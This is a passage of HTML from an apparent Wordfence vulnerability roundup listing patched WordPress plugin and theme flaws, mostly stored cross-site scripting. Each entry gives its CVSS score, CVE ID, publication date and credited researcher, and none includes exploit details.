<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-migration-unlimited-extension" target="_blank" rel="noopener">All-in-One WP Migration Unlimited Extension</a> <span class="wfvr-software-slug">[all-in-one-wp-migration-unlimited-extension]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d2c4a000-94e9-42f1-bdb3-633741fcd54e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8d3c29b8-7910-41f1-b203-6c89519f8806" target="_blank" rel="noopener">Avada (Fusion) Builder &lt;= 3.15.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;size&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16654" target="_blank" rel="noopener noreferrer">							CVE-2026-16654						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-builder" target="_blank" rel="noopener">Avada (Fusion) Builder</a> <span class="wfvr-software-slug">[fusion-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-soares-de-alcantara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/585bd77d4bbe100a43b04223fd09a74f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="585bd77d4bbe100a43b04223fd09a74f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-soares-de-alcantara" target="_blank" rel="noopener">João Pedro Soares de Alcântara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8d3c29b8-7910-41f1-b203-6c89519f8806" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/686dd63b-5471-4654-8009-e3ab648f8b86" target="_blank" rel="noopener">Betheme &lt;= 28.4 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;icon_box_2&#8217; Shortcode</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6178" target="_blank" rel="noopener noreferrer">							CVE-2026-6178						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/betheme" target="_blank" rel="noopener">Betheme</a> <span class="wfvr-software-slug">[betheme]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-soares-de-alcantara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/585bd77d4bbe100a43b04223fd09a74f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="585bd77d4bbe100a43b04223fd09a74f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-soares-de-alcantara" target="_blank" rel="noopener">João Pedro Soares de Alcântara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/686dd63b-5471-4654-8009-e3ab648f8b86" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f29d27aa-a0d9-4675-b762-6509c5743dff" target="_blank" rel="noopener">Cozy Blocks &lt;= 2.2.16 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via cozyHoverEffect Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75019" target="_blank" rel="noopener noreferrer">							CVE-2026-75019						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cozy-addons" target="_blank" rel="noopener">Cozy Blocks – Page Builder for Gutenberg Editor &amp; FSE with 700+ Patterns, 58 Blocks &amp; Templates</a> <span class="wfvr-software-slug">[cozy-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f29d27aa-a0d9-4675-b762-6509c5743dff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb2778ee-f875-4494-ad42-fccc7b38d692" target="_blank" rel="noopener">eCommerce Product Catalog &lt;= 3.5.10 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;style&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76128" target="_blank" rel="noopener noreferrer">							CVE-2026-76128						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ecommerce-product-catalog" target="_blank" rel="noopener">eCommerce Product Catalog</a> <span class="wfvr-software-slug">[ecommerce-product-catalog]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb2778ee-f875-4494-ad42-fccc7b38d692" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/17de5b96-7a61-4f37-a921-6a023cc40812" target="_blank" rel="noopener">Envira Gallery &lt;= 1.12.4 &#8211; Authenticated (Author+) Stored Cross-Site Scripting via Gallery Description</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-3423" target="_blank" rel="noopener noreferrer">							CVE-2026-3423						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/envira-gallery-lite" target="_blank" rel="noopener">Envira Gallery – Image Photo Gallery, Albums, Video Gallery, Slideshows &amp; More</a> <span class="wfvr-software-slug">[envira-gallery-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lord-willmore" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c66fb0b7712651eb163ce36dbb3a214e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c66fb0b7712651eb163ce36dbb3a214e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lord-willmore" target="_blank" rel="noopener">lord willmore</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/17de5b96-7a61-4f37-a921-6a023cc40812" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dd2d1562-2017-45d1-bbd1-46ffd610e7ac" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce &lt; 4.1.21 &#8211; Authenticated (Contributor+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13176" target="_blank" rel="noopener noreferrer">							CVE-2026-13176						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dd2d1562-2017-45d1-bbd1-46ffd610e7ac" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c32649f8-2d1b-4067-a7f1-9bb2d3fe17e4" target="_blank" rel="noopener">Fluent Boards Pro &lt;= 2.0.11 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78273" target="_blank" rel="noopener noreferrer">							CVE-2026-78273						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-boards-pro" target="_blank" rel="noopener">Fluent Boards Pro</a> <span class="wfvr-software-slug">[fluent-boards-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c32649f8-2d1b-4067-a7f1-9bb2d3fe17e4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9cf1230e-759e-4892-8de8-1adb3a0e48a1" target="_blank" rel="noopener">FundEngine &lt;= 1.8.1 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via &#8216;wfp_featured_video_url&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76063" target="_blank" rel="noopener noreferrer">							CVE-2026-76063						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fundraising-donation" target="_blank" rel="noopener">FundEngine – Donation and Crowdfunding Platform</a> <span class="wfvr-software-slug">[wp-fundraising-donation]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9cf1230e-759e-4892-8de8-1adb3a0e48a1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dd26a390-0de5-4699-a790-cac86bf4a057" target="_blank" rel="noopener">GiveWP &lt;= 4.14.4 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5510" target="_blank" rel="noopener noreferrer">							CVE-2026-5510						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform</a> <span class="wfvr-software-slug">[give]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dd26a390-0de5-4699-a790-cac86bf4a057" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c822394-4ce1-4bb0-a8cd-bc3557f0e65d" target="_blank" rel="noopener">Greenshift &lt;= 12.8.9 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Data URI</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5092" target="_blank" rel="noopener noreferrer">							CVE-2026-5092						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/greenshift-animation-and-page-builder-blocks" target="_blank" rel="noopener">Greenshift – animation and page builder blocks</a> <span class="wfvr-software-slug">[greenshift-animation-and-page-builder-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c822394-4ce1-4bb0-a8cd-bc3557f0e65d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b7eb4cac-cf16-438e-81cc-516646e77cdc" target="_blank" rel="noopener">Gutenverse &lt;= 4.0.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;titleTag&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19943" target="_blank" rel="noopener noreferrer">							CVE-2026-19943						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenverse" target="_blank" rel="noopener">Gutenverse – WordPress Blocks, Page Builder &amp; Site Editor</a> <span class="wfvr-software-slug">[gutenverse]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b7eb4cac-cf16-438e-81cc-516646e77cdc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3b345f84-97b5-4a55-9c66-0e9ece048a3c" target="_blank" rel="noopener">Gutenverse &lt;= 4.0.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Blocks</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-3002" target="_blank" rel="noopener noreferrer">							CVE-2026-3002						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenverse" target="_blank" rel="noopener">Gutenverse – WordPress Blocks, Page Builder &amp; Site Editor</a> <span class="wfvr-software-slug">[gutenverse]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3b345f84-97b5-4a55-9c66-0e9ece048a3c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c107674d-173f-49cf-b329-e7bffaee841d" target="_blank" rel="noopener">LiteSpeed Cache &lt;= 7.7 &#8211; Authenticated (Author+) Stored Cross-Site Scripting via img Tag Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-3129" target="_blank" rel="noopener noreferrer">							CVE-2026-3129						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/litespeed-cache" target="_blank" rel="noopener">LiteSpeed Cache</a> <span class="wfvr-software-slug">[litespeed-cache]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/stealthcopter" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f894d5600bcba5e947d6dde37a3cec1b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f894d5600bcba5e947d6dde37a3cec1b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/stealthcopter" target="_blank" rel="noopener">stealthcopter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c107674d-173f-49cf-b329-e7bffaee841d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
